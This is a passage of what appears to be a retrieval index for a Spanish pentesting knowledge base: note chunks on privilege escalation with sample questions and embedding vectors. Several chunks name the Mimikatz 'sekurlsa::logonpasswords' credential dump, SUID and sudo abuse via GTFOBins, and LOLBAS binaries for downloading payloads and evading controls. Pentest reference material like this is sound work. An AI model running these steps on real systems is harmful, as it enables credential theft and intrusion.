0.07418, 0.04005, 0.02159, -0.0258, -0.02601, -0.11981, -0.04041, 0.03986, -0.14614, 0.20638, -0.09409, 0.00805, -0.07358, -0.06456, 0.00537, -0.03788, -0.04228, -0.03362, -0.03829, -0.05236, -0.06546, -0.06662, 0.1271, 0.02263, -0.02308, -0.01219, -0.02059, -0.03352, -0.01942, 0.08324, 0.03575, 0.09441, -0.0023, -0.02259, 0.02872, -0.11611, 0.0769, -0.07622, -0.09324, 0.01813, -0.04994, 0.00868, -0.05844, -0.03592, -0.06153, 0.03139, 0.02337, 0.03692, -0.02232, 0.02193, -0.05626, -0.09759, -0.02871, 0.12616, -0.03872, -0.05114, 0.14356, -0.06162, -0.05672, -0.05014, -0.00725, -0.04013, -0.0714, 0.02086, 0.04381, -0.00286, -0.03216, 0.01868, -0.00916, -0.02158, -0.03676, -0.06385, -0.09848, 0.02512, 0.07429, -0.06887, -0.10074, 0.09932, 0.0609, 0.02327, 0.03559, 0.01596, -0.01042, 0.0304, -0.10062, -0.05325, 0.02744, -0.05098, -0.08932, -0.06877, -0.10229, -0.01502, -0.01832, -0.00482, 0.04732, 0.03529, -0.08683, 0.08652, -0.04134, 0.04153, -0.02934, -0.04128, 0.00377, -0.03603, 0.01323, 0.02042, -0.0278, -0.04445, 0.01852, -0.06245, 0.03698, -0.08253, -0.01823, -0.03682, -0.06572, 0.06775, 0.00565, -0.01512, -0.03367, 0.03704, -0.00592, 0.07789, -0.0052, 0.02032, -0.05185, 0.05233, 0.00609, -0.01149, -0.04987, -0.07128, -0.05309, 0.03439, -0.00476, -0.04106, 0.00727, -0.01266, -0.04878, 0.01204, 0.00425, -0.01383, 0.02999, -0.00561, 0.02295, 0.04226, 0.03331, 0.02722, -0.04277, 0.12035, 0.02601, -0.04095, -0.06114, -0.02982, 0.00963, -0.0184, 0.03484, 0.00934, -0.10162, 0.02073, 0.03329, 0.04251, -0.03863, 0.00056, 0.04245, 0.02793, 0.01558, 0.04787, 0.02263, -0.04205, -0.01767, -0.05133, 0.04364, 0.04028, -0.0475, 0.03799, -0.001, 0.03947, 0.04067, -0.0255, -0.01405, -0.01128, 0.04072, -0.01474, -0.08137, 0.01178, -0.08643, 0.00733, 0.02879, 0.03398, -0.06767, 0.02577, -0.02061, -0.02293, -0.03117, 0.01531, 0.09045, 0.04639, -0.04513, -0.01157, -0.0215, -0.03766, -0.07537, -0.0566, -0.06963, -0.01517, 0.02436, 0.03255, -0.08246, 0.00475, -0.02666]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Herramientas\n`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) β†’ ver Herramientas (Γ­ndice) y PEASS-ng.", "indexar": "que programa me ayuda a detectar privilegios no deseados en una cuenta?", "v": [0.14265, 0.19151, -0.24085, -0.11292, 0.11538, -0.0102, 0.01202, -0.03671, -0.11905, -0.0858, 0.00984, 0.00981, -0.14609, -0.09637, 0.02482, -0.05054, 0.09498, 0.00761, 0.11924, 0.04158, 0.10865, -0.12118, -0.04139, -0.05432, -0.03063, -0.02708, 0.05946, -0.0253, -0.03907, 0.10695, -0.01701, -0.10481, -0.03558, -0.04919, 0.02517, 0.0167, 0.03033, -0.01007, 0.01403, 0.04941, 0.08906, 0.031, 0.0104, 0.00053, 0.11102, -0.0344, -0.08973, 0.0656, 0.0055, 0.00561, 0.0891, -0.02478, -0.0579, -0.06746, 0.06148, -0.0584, 0.00199, -0.03103, -0.03921, -0.08061, -0.04773, -0.04166, 0.08927, 0.07078, -0.00223, -0.00315, 0.12725, -0.03443, -0.02626, -0.00553, -0.08495, -0.04984, 0.03875, -0.01321, -0.02451, 0.01658, 0.06088, -0.09035, 0.1138, -0.14017, 0.00768, 0.04185, 0.04031, 0.08493, -0.03852, -0.06351, 0.02192, 0.09921, 0.01658, -0.09604, 0.01606, 0.03171, 0.00742, 0.02202, 0.07409, -0.02576, 0.11904, 0.05941, 0.04359, 0.07418, 0.07639, -0.12299, -0.08896, 0.12073, 0.04848, 0.05228, 0.04131, -0.0856, -0.10905, 0.02528, -0.04091, -0.02999, 0.02911, -0.05303, -0.08518, 0.09359, 0.01286, 0.03233, 0.0155, -0.08859, -0.13675, 0.00883, -0.02681, 0.01003, 0.11722, -0.10224, -0.08142, 0.09944, 0.02084, 0.08858, -0.04581, 0.01453, -0.0175, -0.05375, -0.06115, -0.01632, -0.06634, -0.06678, -0.05551, 0.01345, 0.02724, 0.00424, -0.00339, -0.0428, 0.06045, -0.0105, -0.01334, -0.03797, -0.02341, 0.01247, -0.00087, -0.00924, 0.00818, 0.03252, -0.10685, -0.04795, 0.03583, -0.02852, -0.00804, 0.02977, -0.0525, -0.00173, -0.02393, -0.07253, 0.09466, -0.04715, 0.04957, -0.02305, 0.0857, 0.0143, -0.04345, 0.03562, 0.02076, -0.02866, -0.10398, -0.02034, 0.05469, -0.04567, 0.02695, 0.00496, -0.13592, 0.06958, 0.10211, -0.04828, -0.02799, -0.05778, -0.06347, 0.00077, 0.05891, 0.05334, 0.069, 0.01101, -0.02238, 0.00393, -0.0107, -0.01586, -0.00394, 0.00677, 0.06955, -0.05185, -0.06335, -0.05043, 0.01514, -0.00376, -0.03449, 0.0394, -0.0281, -0.00473, 0.01608, 0.06092, 0.05095, -0.03101, 0.03487, -0.00662, -0.03737, -0.00237, -0.00758, 0.03893, -0.00881, 0.01764, 0.02018, -0.04646, 0.10759, 0.08407, 0.03019, -0.08307, 0.06709, 0.06935, 0.05085, 0.04331, 0.01351, -0.07787, 0.0211, -0.06076, 0.02569, -0.0298, 0.01357, -0.04579, 0.00523, -0.05091, 0.03337, 0.08312, 0.04788, -0.05916, 0.01743, 0.00948, -0.06306, -0.03522, 0.00553, -0.02201, 0.02129, 0.07439, 0.09862, -0.11275, 0.09943, 0.06494]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Tras conseguir SYSTEM\n- Mimikatz β†’ `sekurlsa::logonpasswords` β†’ hashes/creds de dominio.\n- Esas creds β†’ Movimiento lateral y Active Directory.\n\nRelacionado: Potato attacks Β· Exploits conocidos Β· PEASS-ng Β· Privesc Linux Β· OSCP MOC", "indexar": "quΓ© herramienta me sirve para extraer hashes o credenciales de dominio?", "v": [-0.00502, -0.02006, -0.12799, -0.07256, 0.06441, -0.09269, -0.04021, -0.05017, -0.09026, -0.02737, -0.09818, 0.0158, -0.08687, -0.22831, 0.11935, 0.05096, 0.21069, -0.02651, -0.03749, -0.04037, -0.05483, -0.04549, -0.17957, -0.05075, -0.06976, -0.10994, -0.07701, 0.02547, -0.18601, 0.16693, 0.01212, 0.02621, -0.05701, 0.01623, -0.11072, 0.03916, -0.09023, 0.09865, 0.021, 0.12603, 0.02822, 0.04434, -0.08553, 0.06751, -0.05163, -0.04654, -0.0433, 0.01513, -0.01041, -0.02662, 0.02767, -0.18277, -0.18065, -0.01307, 0.05249, -0.07467, 0.1223, -0.10695, -0.04064, -0.14364, -0.12143, -0.02764, -0.00955, -0.03318, -0.0701, -0.11898, -0.00033, -0.03799, -0.06003, 0.06426, -0.07531, 0.03904, 0.14095, 0.00299, -0.00028, -0.076, 0.06561, -0.01568, 0.07919, -0.03749, 0.10981, -0.03977, -0.01704, -0.04901, -0.03789, -0.04852, -0.0234, -0.1043, 0.03779, 0.032, 0.05226, 0.11327, -0.06353, -0.05275, -0.03972, -0.00154, 0.04085, -0.04425, -0.04964, -0.03135, 0.11782, -0.01351, -0.09576, 0.10778, 0.03191, 0.04931, 0.0023, -0.01931, -0.04438, 0.01216, 0.08565, -0.01575, -0.03735, 0.00445, -0.04872, 0.12165, -0.06437, 0.03283, -0.02575, -0.02758, 0.01461, -0.0623, 0.07, -0.01639, 0.00248, -0.01669, -0.0761, 0.01014, -0.04938, -0.19925, -0.01569, -0.03093, -0.04502, 0.04157, 0.06548, 0.00964, 0.0991, -0.0819, -0.05172, -0.04779, 0.03315, -0.01302, -0.09948, -0.08033, -0.02383, -0.02238, 0.05984, -0.05115, 0.0239, -0.08456, 0.0136, -0.04905, 0.02058, 0.02054, -0.04217, 0.00591, -0.03869, 0.01671, -0.10419, 0.04352, -0.08341, -0.1021, 0.04587, 0.03379, 0.01383, -0.03004, 0.05122, -0.00633, 0.02341, 0.10002, 0.03364, -0.02137, 0.04355, -0.03568, 0.01425, -0.00693, -0.00992, 0.01217, -0.03772, -0.07336, -0.01302, -0.0463, 0.0157, 0.0373, -0.0076, 0.03347, 0.03509, -0.00289, -0.03579, 0.03141, 0.02155, 0.03726, -0.0244, -0.02958, 0.02303, 0.02646, 0.04886, -0.06321, 0.02321, -0.0093, -0.03422, -0.01696, 0.02904, -0.02005, 0.0151, 0.07076, -0.00112, -0.06623, 0.00759, 0.02109, 0.00072, 0.01809, 0.01309, -0.0276, -0.04017, 0.02159, -0.02244, 0.02875, -0.04983, -0.07651, -0.0188, 0.00976, 0.02355, -0.01322, -0.00582, 0.04703, -0.00046, 0.0128, 0.00252, 0.01468, 0.03423, -0.03745, -0.03105, 0.00619, -0.0097, -0.07872, 0.01842, 0.02769, -0.01754, -0.02887, -0.06544, -0.00252, 0.01696, -0.02736, -0.05675, -0.02572, 0.00016, 0.02771, -0.03413, -0.0257, -0.02247, -0.0178, 0.03524, -0.00712, 0.00747, 0.02526]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Tras conseguir SYSTEM\n- Mimikatz β†’ `sekurlsa::logonpasswords` β†’ hashes/creds de dominio.\n- Esas creds β†’ Movimiento lateral y Active Directory.\n\nRelacionado: Potato attacks Β· Exploits conocidos Β· PEASS-ng Β· Privesc Linux Β· OSCP MOC", "indexar": "con quΓ© puedo hacer movimientos laterales en un entorno Active Directory?", "v": [0.0582, 0.2248, -0.07306, -0.13145, -0.11961, 0.06031, -0.05999, 0.07922, -0.10892, -0.03674, 0.0483, -0.05364, -0.06973, -0.01481, 0.10042, 0.02504, 0.13301, -0.04304, -0.14777, -0.04706, -0.0554, -0.02717, -0.0598, 0.04606, 0.12181, 0.00786, -0.00149, -0.00436, -0.04359, -0.01882, -0.02901, 0.12804, 0.11356, -0.02378, 0.06983, -0.07435, -0.04746, 0.0474, 0.0826, -0.06729, -0.14778, 0.02689, -0.16449, 0.02353, 0.0144, 0.12545, -0.05151, -0.12116, -0.03571, -0.03792, -0.01947, -0.00158, -0.02942, -0.11586, 0.04158, -0.05945, 0.08995, -0.09947, 0.0199, -0.15253, 0.00768, 0.03223, -0.01543, 0.03988, -0.03949, -0.1334, 0.14781, -0.07212, -0.06321, 0.01174, 0.00402, -0.05984, -0.01068, 0.13512, -0.01808, 0.07345, 0.04231, -0.05354, -0.12613, 0.12435, 0.0246, 0.07869, 0.00997, -0.0021, -0.08852, -0.1255, -0.05908, -0.08875, 0.01892, -0.05578, 0.09231, 0.05286, -0.07902, 0.03733, -0.05006, 0.09892, -0.04137, 0.05581, -0.02293, 0.05468, 0.00277, 0.00048, -0.10357, 0.03121, 0.04216, 0.0184, 0.02844, 0.01964, -0.06515, 0.02179, -0.0255, -0.03588, -0.0262, -0.08666, 0.04389, 0.09553, -0.16166, -0.03509, -0.01311, 0.0438, -0.04438, -0.06287, -0.02054, -0.06268, -0.02757, 0.01125, 0.0063, 0.05076, -0.03121, 0.07371, 0.03807, 0.04669, 0.01942, -0.13068, -0.04177, -0.00846, 0.01663, 0.06515, 0.09254, -0.07396, 0.02168, -0.05159, 0.04873, 0.01621, 0.03268, 0.0316, 0.08596, 0.04606, -0.0166, 0.06842, 0.00836, 0.01429, 0.00419, 0.00943, 0.03418, 0.04461, -0.04251, -0.02268, -0.02614, 0.048, 0.04144, 0.10452, -0.05699, -0.03198, -0.01268, -0.04366, -0.07927, -0.03542, -0.00287, 0.0751, -0.08251, 0.02403, 0.02357, -0.07831, 0.0383, 0.01839, -0.02869, -0.00143, 0.08277, -0.00265, -0.00167, 0.06679, -0.015, -0.02658, 0.01944, -0.00929, 0.05736, -0.01688, 0.00143, 0.07877, -0.03676, 0.11263, 0.00403, -0.05105, -0.0491, -0.08742, -0.00879, -0.01454, -0.00203, -0.05473, 0.01279, 0.03828, 0.03272, -0.0338, 0.04355, 0.05069, -0.06466, 0.14458, 0.0531, 0.03416, -0.00858, -0.015, 0.13752, 0.06604, -0.12212, 0.04151, -0.01675, 0.0015, -0.03671, 0.00959, -0.00434, 0.01148, 0.03646, -0.02497, 0.03943, 0.02205, 0.02666, -0.00905, 0.01046, 0.06583, 0.00737, 0.01147, 0.00195, -0.00541, 0.0101, 0.06681, 0.0403, -0.03842, -0.05778, -0.00754, 0.00402, 0.0247, -0.00796, -0.01915, -0.01839, -0.05408, -0.05564, 0.06223, -0.01721, -0.07105, 0.01752, -0.02168, 0.0293, -0.03928, -0.00555, 0.00335]} -{"tipo": "pregunta", "herramienta": "Privesc Windows", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Privesc Windows.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Tras conseguir SYSTEM\n- Mimikatz β†’ `sekurlsa::logonpasswords` β†’ hashes/creds de dominio.\n- Esas creds β†’ Movimiento lateral y Active Directory.\n\nRelacionado: Potato attacks Β· Exploits conocidos Β· PEASS-ng Β· Privesc Linux Β· OSCP MOC", "indexar": "existe alguna alternativa a Mimikatz para obtener permisos de administrador?", "v": [-0.05465, 0.20842, -0.08644, -0.09712, -0.00527, 0.00826, -0.1119, -0.06226, -0.36054, -0.0941, 0.10627, -0.08925, 0.16362, 0.06328, 0.21675, -0.1176, 0.16877, -0.02171, 0.10123, -0.0039, 0.13028, 0.01429, 0.03003, 0.07057, -0.06793, -0.0344, 0.09867, -0.05749, -0.07413, -0.06214, 0.06062, 0.01762, -0.00898, 0.00618, 0.00705, 0.02601, 0.08179, 0.00226, 0.04998, -0.05997, 0.04332, 0.01322, -0.0548, 0.08775, -0.04133, -0.04415, -0.09655, -0.0336, 0.0894, -0.01956, -0.05953, -0.05123, -0.10388, -0.04158, 0.06194, 0.04588, 0.06592, -0.10083, -0.07461, 0.04934, -0.03967, -0.08174, 0.01917, 0.05514, 0.01403, 0.09268, 0.04543, 0.01677, -0.06453, 0.13721, -0.04016, 0.04498, 0.03327, -0.07011, 0.00905, 0.02963, -0.08207, -0.00371, 0.00615, 0.04844, 0.02538, 0.05877, -0.07684, -0.01423, -0.0509, -0.15914, -0.08507, -0.13116, -0.03044, 0.02936, -0.0547, 0.04183, 0.0118, -0.00116, -0.06483, -0.04843, -0.00772, 0.05014, -0.12809, 0.08201, -0.01467, 0.07819, -0.06321, 0.08258, -0.02538, 0.04816, 0.04714, -0.05977, -0.02344, 0.02898, -0.0065, 0.02898, -0.05466, 0.03629, -0.01921, 0.01275, -0.05961, -0.04022, -0.07318, -0.03935, 0.00221, -0.01489, 0.02771, 0.02098, 0.03294, -0.0324, -0.01841, 0.09233, -0.02438, 0.00512, 0.02778, -0.0972, 0.04912, -0.07025, -0.08314, 0.00642, 0.01905, 0.01979, -0.03771, -0.01527, -0.09071, -0.03927, 0.03615, -0.00505, 0.06435, 0.01097, -0.08544, -0.00954, 0.03412, -0.09045, -0.07474, -0.00672, -0.01559, 0.11058, -0.00863, 0.07606, 0.00284, -0.01137, -0.04278, 0.08923, 0.07149, -0.06802, -0.04858, 0.07204, -0.02268, 0.01987, -0.00439, -0.0375, -0.02647, 0.01554, -0.04917, 0.0723, 0.02558, -0.03626, 0.05628, -0.01094, -0.03665, -0.05291, 0.01517, -0.0198, 0.0499, 0.04237, -0.04397, 0.02818, -0.00465, -0.02831, 0.0132, 0.10582, -0.04272, 0.02186, 0.05176, 0.00664, -0.00726, -0.05598, 0.00249, 0.01554, 0.07351, -0.06282, -0.05215, -0.05615, 0.00241, -0.00413, -0.0098, -0.04003, 0.04751, -0.07736, -0.01118, 0.04255, 0.05443, -0.02416, 0.05012, 0.01485, 0.05449, 0.01481, -0.00762, -0.00605, -0.00446, 0.00026, 0.03166, -0.08391, 0.00688, -0.00619, 0.01973, 0.09147, 0.08473, -0.01449, 0.00663, -0.00227, -0.0135, 0.06013, -0.00676, -0.00839, 0.05014, 0.03735, 0.01959, -0.03103, 0.00604, -0.02062, 0.03604, 0.03858, 0.02758, -0.0127, 0.0792, 0.00859, -0.02986, 0.00359, -0.02641, 0.02228, -0.06302, -0.02865, 0.06465, 0.0199, -0.00224, 0.02783, 0.05504, -0.0059]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## GTFOBins (Linux) β€” https://gtfobins.github.io\n- Dado un binario con SUID, `sudo`, o capability β†’ cΓ³mo abusarlo para shell/leer/escribir como root.\n- Flujo: `sudo -l` o `find / -perm -4000` β†’ buscas el binario en GTFOBins.\n- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID β†’ root trivial.", "indexar": "que hay para encontrar binarios con permisos especiales en linux", "v": [0.20153, -0.0023, -0.01782, -0.02482, 0.02555, -0.15234, -0.2124, -0.07655, -0.15726, -0.08258, 0.15579, -0.02316, 0.10602, -0.03744, 0.02729, -0.1354, -0.14632, -0.09219, 0.0208, -0.07762, 0.0421, 0.10415, -0.09875, 0.07927, 0.06404, -0.0358, -0.0232, -0.08511, -0.15194, 0.08846, 0.01987, 0.06762, 0.10519, 0.02441, -0.00886, 0.0005, 0.03949, 0.10078, 0.00903, 0.02194, 0.12455, 0.00115, -0.06436, 0.09343, -0.16299, -0.1347, -0.08155, 0.05889, -0.03267, -0.10813, 0.03694, 0.02035, -0.07992, -0.10181, 0.10392, -0.07144, 0.13183, -0.09842, -0.05863, -0.02014, -0.0823, -0.0203, 0.05043, -0.02326, 0.00555, 0.04357, 0.04562, 0.10808, -0.07558, 0.04586, -0.11697, 0.11888, 0.04072, 0.08246, 0.035, 0.00929, -0.10997, 0.03732, 0.14012, -0.01223, 0.11841, 0.02965, 0.01374, 0.03554, -0.03491, -0.07571, -0.00344, 0.03075, -0.02149, 0.05049, 0.03597, 0.08628, -0.08724, 0.06167, 0.10561, -0.02122, -0.05636, 0.08116, -0.03548, 0.01897, 0.01553, 0.0612, -0.04128, 0.13726, -0.05312, 0.06667, 0.064, -0.03401, -0.0158, -0.00311, 0.0516, -0.03576, 0.08406, -0.01063, 0.01273, -0.00053, -0.05778, -0.01915, -0.00859, -0.00083, -0.0854, 0.023, -0.02014, 0.03498, 0.04548, -0.08085, -0.02997, 0.10502, -0.00515, -0.03451, 0.03394, -0.05042, -0.0173, -0.00194, -0.08892, 0.11413, 0.04924, -0.05544, -0.13791, -0.00145, 0.0085, 0.01959, 0.03609, 6e-05, 0.03874, 0.08771, -0.01255, -0.02426, 0.007, -0.08851, 0.00941, 0.03204, 0.05297, -0.01877, -0.09589, 0.00058, -0.02784, -0.06687, -0.01816, 0.05086, 0.0125, 0.0241, -0.07682, 0.00114, 0.0119, 0.06583, -0.07562, 0.00687, -0.00415, -0.04222, -0.0313, 0.03481, -0.00388, -0.09219, 0.03471, -0.11025, -0.01012, -0.05025, -0.0351, -0.01469, -0.04061, -0.0433, 0.04761, -0.04443, 0.03823, 0.01047, 0.00049, -0.00727, 0.03975, 0.01291, 0.04748, 0.03792, -0.02543, -0.05372, -0.02998, 0.01956, 0.00998, -0.0196, -0.0621, -0.03049, 0.0074, 0.07459, -0.02237, -0.02305, 0.07263, -0.03755, -0.03826, -0.02182, 0.01271, -0.02071, -0.0445, -0.05803, 0.0295, -0.03647, -0.06343, 0.04292, 0.03271, 0.01114, 0.06205, -0.01842, 0.04653, -0.0083, 0.04531, 0.08137, 0.00979, -0.0563, 0.02249, 0.02113, 0.00637, 0.05158, -0.01677, 0.0263, -0.01653, -0.00985, 0.02786, 0.04631, 0.00722, 0.02208, 0.00111, -0.01824, 0.01441, 0.03923, 0.02393, -0.03673, -0.06596, -0.02427, -0.04259, -0.03361, -0.01734, -0.04021, -0.00204, 0.01687, 0.01534, -0.04728, -0.00305, -0.03548]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## GTFOBins (Linux) β€” https://gtfobins.github.io\n- Dado un binario con SUID, `sudo`, o capability β†’ cΓ³mo abusarlo para shell/leer/escribir como root.\n- Flujo: `sudo -l` o `find / -perm -4000` β†’ buscas el binario en GTFOBins.\n- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID β†’ root trivial.", "indexar": "cual es una guia para explotar bugs de programas con sudo o capabilities", "v": [0.1315, -0.06805, -0.10658, -0.07143, 0.05215, -0.11305, -0.03492, -0.04672, -0.02663, -0.09048, -0.16194, -0.01184, -0.12192, 0.03667, -0.18189, -0.07983, -0.04684, -0.09049, -0.01944, 0.02863, 0.04781, 0.11911, 0.03048, 0.02887, -0.039, 0.01285, 0.11481, -0.04104, -0.04546, -0.04224, -0.06113, 0.0549, 0.04756, -0.1888, -0.15914, 0.07608, 0.04123, 0.01569, -0.00341, 0.12253, -0.05602, 0.01086, -0.10156, 0.03431, 0.07666, -0.10394, 0.0214, -0.04554, 0.079, -0.09688, -0.02307, -0.05183, -0.07775, -0.06268, 0.13733, -0.0784, 0.09648, -0.16549, -0.01941, 0.05903, -0.1475, 0.00334, 0.12203, -0.00673, 0.02028, -0.01315, 0.00512, 0.00786, -0.13422, 0.08271, -0.0143, 0.06245, 0.03932, 0.07619, 0.00158, -0.01148, -0.03737, 0.03119, 0.09083, 0.02812, 0.02822, 0.05706, -0.04548, 0.06203, -0.11249, -0.0708, -0.00157, -0.05316, -0.03666, -0.07583, 0.08237, 0.04559, 0.06349, 0.07389, 0.08277, -0.03881, 0.18253, 0.10255, 0.09667, 0.02085, -0.05294, -0.03504, -0.06897, 0.20469, 0.0143, 0.02863, 0.05377, -0.00956, -0.0943, 0.02443, 0.00459, -0.00142, 0.05187, 0.03344, -0.02709, -0.07294, -0.07672, -0.0989, -0.02121, -0.08755, -0.16051, -0.04784, -0.04254, -0.03299, 0.07514, -0.05786, -0.02879, 0.09627, 0.01702, -0.0393, -4e-05, 0.00715, -0.00342, -0.01898, -0.02918, 0.03942, 0.05336, 0.02781, -0.01369, -0.05892, 0.02221, 0.02678, 0.01211, 0.02576, 0.04416, 0.07445, -0.05369, -0.02321, -0.06152, 0.00555, 0.02415, 0.03424, 0.05291, 0.08265, -0.11008, -0.03252, -0.02703, 0.0532, -0.01615, 0.05542, 0.08171, -0.04434, -0.0652, -0.0008, 0.03933, -0.03812, -0.0301, 0.01918, 0.04435, 0.02057, -0.00977, 0.09136, 0.06254, -0.07421, 0.01887, -0.03772, 0.03679, -0.03, 0.04401, -0.04583, 0.00252, 0.04682, 0.01971, 0.02506, -0.03077, -0.01667, -0.00118, -0.04211, -0.02813, -0.02005, -0.04001, 0.01719, 0.00177, -0.0089, 0.03873, -0.04156, -0.04621, 0.00415, -0.00139, -0.06536, -0.02708, 0.02657, -0.07094, -0.04085, 0.05352, 0.04999, -0.01149, 0.02564, -0.03258, 0.06943, 0.06346, 0.02378, 0.07873, 0.00064, -0.09289, -0.05742, 0.01661, 0.06714, 0.07785, -0.01556, -0.01159, 0.03842, 0.07722, -0.03443, 0.00446, -0.07533, -0.01644, -0.01762, 0.0314, 0.04116, 0.00514, -0.00921, 0.0201, -0.02494, -0.02331, 0.00098, 0.0229, -0.01998, 0.02306, -0.07502, -0.00082, 0.06108, 0.03158, -0.07174, -0.03724, -0.00063, -0.05134, 0.0146, -0.00888, -0.02066, -0.03904, 0.05702, 0.05829, 0.00978, 0.03026, -0.02338]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## LOLBAS (Windows) β€” https://lolbas-project.github.io\n- \"Living Off the Land Binaries\": binarios firmados de Windows para descargar/ejecutar/bypassear.\n- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).", "indexar": "que programa sirve para transferir archivos usando herramientas ya instaladas en Windows?", "v": [0.12103, 0.05925, -0.15317, -0.23922, 0.08417, -0.13444, -0.04011, -0.10679, -0.02434, -0.08448, -0.10815, -0.12589, -0.03546, -0.07289, -0.04621, 0.00653, 0.07273, -0.13524, 0.10002, -0.01236, -0.01914, 0.08009, -0.05527, -0.08589, -0.11074, 0.04808, -0.02218, -0.03349, -0.19436, 0.02519, 0.03301, -0.00947, 0.10675, -0.05203, -0.02095, -0.06697, -0.03303, 0.0554, 0.03189, 0.08845, 0.10371, 0.09847, -0.03326, 0.13165, 0.07154, -0.07989, 0.08413, -0.08247, 0.06147, -0.00025, 0.0014, -0.06684, -0.07152, 0.00097, 0.0296, -0.15946, 0.06965, -0.12962, -0.02748, 0.07237, -0.07019, 0.08309, -0.04596, 0.09373, 0.01079, 0.01473, 0.01696, -0.03481, -0.10367, 0.13685, -0.01028, 0.08613, 0.08559, 0.00392, -0.06823, 0.01633, -0.01766, -0.03352, 0.04226, -0.10285, 0.06403, 0.02144, 0.03191, -0.03712, 0.00187, -0.08883, -3e-05, 0.00044, 0.03287, -0.07793, 0.02641, -0.01141, 0.02104, 0.05918, 0.1366, -0.04796, 0.062, -0.00212, 0.06043, 0.03179, 0.06695, -0.045, -0.01344, 0.11931, -0.07434, 0.1005, 0.04847, -0.08845, -0.02735, -0.0079, 0.07398, 0.09982, 0.0157, 0.03845, -0.03136, 0.0685, 0.00862, -0.10413, -0.02324, -0.01022, -0.05931, 0.08537, -0.04551, 0.06002, 0.0266, -0.07347, -0.05336, 0.09799, -0.10466, 0.07669, 0.06175, -0.01851, -0.07547, -0.02326, -0.13663, -0.05916, 0.06711, -0.03644, -0.00316, -0.08907, 0.07547, 0.11415, 0.02997, -0.01037, 0.02353, 0.071, 0.05177, 0.0078, -0.00639, -0.05866, 0.05699, -0.05282, -0.01212, 0.04325, -0.07386, -0.00106, 0.01255, 0.00142, -0.09891, -0.00234, -0.07401, -0.0026, -0.01511, -0.04791, 0.00609, -0.05042, 0.04388, 0.09792, 0.09078, 0.04388, 0.03548, 0.09001, 0.02208, -0.02315, -0.00641, 0.03116, 0.00936, -0.04716, 0.01577, -0.02541, -0.0773, 0.03733, 0.04615, 0.03066, 0.02174, 0.00138, -0.02912, 0.06055, -0.04477, 0.04055, -0.07559, -0.01804, 0.00946, -0.05623, 0.01532, 0.00966, -0.08404, -0.00833, 0.01525, -0.00688, -0.02795, 0.02496, -0.0175, -0.04257, 0.08559, 0.08935, -0.06288, -0.02423, 0.04872, 0.08467, -0.03221, 0.00043, 0.04932, -0.0332, 0.00092, -0.05974, -0.02886, 0.02111, 0.03843, 0.02514, 0.00989, -0.02448, 0.01493, 0.0162, -0.01379, 0.00104, -0.06022, -0.02485, -0.01542, -0.00092, -0.0038, 0.0341, 0.02176, -0.00022, 0.01802, -0.05342, -0.0233, -0.02607, -0.03119, -0.03075, -0.07707, 0.05553, -0.01174, -0.0287, -0.08839, 0.01539, -0.0416, -0.0406, 0.02493, -0.03646, 0.01198, 0.03588, 0.02231, -0.0225, 0.00307, 0.05052]} -{"tipo": "pregunta", "herramienta": "GTFOBins y LOLBAS", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/GTFOBins y LOLBAS.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## LOLBAS (Windows) β€” https://lolbas-project.github.io\n- \"Living Off the Land Binaries\": binarios firmados de Windows para descargar/ejecutar/bypassear.\n- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).", "indexar": "con quΓ© puedo ejecutar binarios nativos sin descargar nada extra?", "v": [0.0798, 0.10599, -0.1029, 0.12739, 0.02444, 0.01878, -0.06328, -0.05356, -0.17774, -0.07088, 0.0163, -0.08273, 0.00687, -0.01776, -0.03145, -0.04347, -0.02008, 0.06284, 0.11553, -0.04817, 0.05791, -0.04735, 0.0169, -0.07223, 0.04823, 0.02813, -0.13601, 0.13121, -0.12654, 0.04927, 0.02622, 0.08624, 0.17954, -0.04704, -0.01204, 0.08527, -0.07206, 0.03119, -0.06623, 0.00907, 0.07471, 0.04877, -0.12551, 0.12948, -0.08139, -0.01524, -0.03638, -0.02691, -0.06045, -0.09333, 0.08632, 0.10479, -0.08256, -0.11344, -0.02677, -0.09887, 0.17177, -0.22926, -0.04185, 0.04953, 0.037, 0.09016, 0.1321, -0.02334, 0.04411, -0.06707, 0.03519, 0.08306, -0.09855, 0.04688, -0.05588, 0.10252, 0.05376, 0.07391, 0.04559, 0.05376, 0.00532, -0.05396, 0.13133, 0.05831, 0.09998, -0.04627, 0.02038, -0.00033, -0.022, -0.0693, -0.11187, -0.06111, 0.02978, -0.06471, 0.0439, 0.00887, -0.04904, -0.00287, 0.01199, -0.094, -0.01539, 0.02042, -0.03051, 0.12887, 0.02412, -0.01129, 0.01242, 0.09012, 0.05145, 0.11343, -0.00424, -0.01185, 0.0189, 0.00396, 0.01343, 0.00984, 0.06058, -0.02805, 0.03914, -0.02418, -0.06728, -0.01225, 0.0107, 0.02693, -0.14946, 0.02039, -0.02956, -0.02968, 0.05732, -0.17759, 0.02286, -0.03207, 0.00065, 0.0581, 